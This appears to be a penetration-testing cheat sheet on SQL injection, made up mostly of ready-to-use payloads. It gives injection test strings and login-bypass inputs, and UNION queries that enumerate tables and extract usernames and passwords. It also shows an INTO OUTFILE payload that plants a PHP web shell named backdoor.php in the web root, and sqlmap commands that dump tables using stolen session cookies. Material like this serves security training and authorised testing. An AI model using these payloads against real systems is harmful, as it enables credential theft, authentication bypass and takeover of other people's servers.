SQL injection

Basic technique

Stick ' in a parameter and see if it throws a database error (and note what kind).
Another simple test:
1
' or '1'='1
Copied!
Other tests:
1
-'
2
' '
3
'&'
4
'^'
5
'*'
6
' or ''-'
7
' or '' '
8
' or ''&'
9
' or ''^'
10
' or ''*'
11
"-"
12
" "
13
"&"
14
"^"
15
"*"
16
" or ""-"
17
" or "" "
18
" or ""&"
19
" or ""^"
20
" or ""*"
21
or true--
22
" or true--
23
' or true--
24
") or true--
25
') or true--
26
' or 'x'='x
27
') or ('x')=('x
28
')) or (('x'))=(('x
29
" or "x"="x
30
") or ("x")=("x
31
")) or (("x"))=(("x
Copied!

POST parameters

You can also attempt to inject parameters passed using POST requests, but you'll need Burp or Firefox tamper to view and edit them. For example, you can test a parameter by adding a ' at the end, like lang=en'.

Bypassing authentication

If you find a poorly-sanitized login page, you can attempt to log in without credentials by injecting the username parameter:
1
username' or 1=1;#
2
username'-
Copied!

Database enumeration

The exact syntax for injection will vary by database type. In most lab scenarios, the database will be MySQL.
Get version:
1
http://[host]/inject.php?id=1 union all select 1,2,3,@@version,5
Copied!
You can get the number of columns through trial and error using order by. For each query, increase the column number until the database throws an unknown column error:
1
http://[host]/inject.php?id=54 order by 1
2
http://[host]/inject.php?id=54 order by 2
3
http://[host]/inject.php?id=54 order by 3
Copied!
Get the current user:
1
http://[host]/inject.php?id=1 union all select 1,2,3,user(),5
Copied!
See all tables:
1
http://[host]/inject.php?id=1 union all select 1,2,3,table_name,5 FROM information_schema.tables
Copied!
Get column names for a specified table:
1
http://[host]/inject.php?id=1 union all select 1,2,3,column_name,5 FROM information_schema.columns where table_name='users'
Copied!
Get usernames and passwords (0x3a means :):
1
http://[host]/inject.php?id=1 union all select 1,2,3,concat(name, 0x3A , password),5 from users
Copied!
You might be able to write to system files depending on permission levels using MySQL's INTO OUTFILE function to create a php shell in the web root:
1
http://[host]/inject.php?id=54 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'
Copied!
I suspect you could inject a full reverse shell in there too...

SQLmap

Assuming you've tested a parameter with ' and it is injectable, run SQL map against the URL:
1
sqlmap -u "http://[host]/inject.php?param1=1&param2=whatever" --dbms=mysql
Copied!
It may not run unless you specify the database type.
Get the databases:
1
sqlmap -u "http://[host]/inject.php?param1=1&param2=whatever" --dbs --dbms=mysql
Copied!
Get the tables in a database:
1
sqlmap -u "http://[host]/inject.php?param1=1&param2=whatever" --tables -D [database name]
Copied!
Get the columns in a table:
1
sqlmap -u "http://[host]/inject.php?param1=1&param2=whatever" --columns -D [database name] -T [table name]
Copied!
Dump a table:
1
sqlmap -u "http://[host]/inject.php?param1=1&param2=whatever" --dump -D [database name] -T [table name]
Copied!

Passing tokens

If the URL isn't accessible, you can pass cookie data or authentication credentials to SQLmap by pasting the post request in a file and using the -r option:
1
sqlmap -r request.txt
Copied!
If you just need to pass a cookie:
1
sqlmap -u "http://[host]/inject.php" --cookie "PHPSESSID=foobar"
Copied!

REST-style URLs

If your URLs have no parameters, you can still test them:
1
sqlmap -u "http://[host]/param1*/param2*"
Copied!

Further reading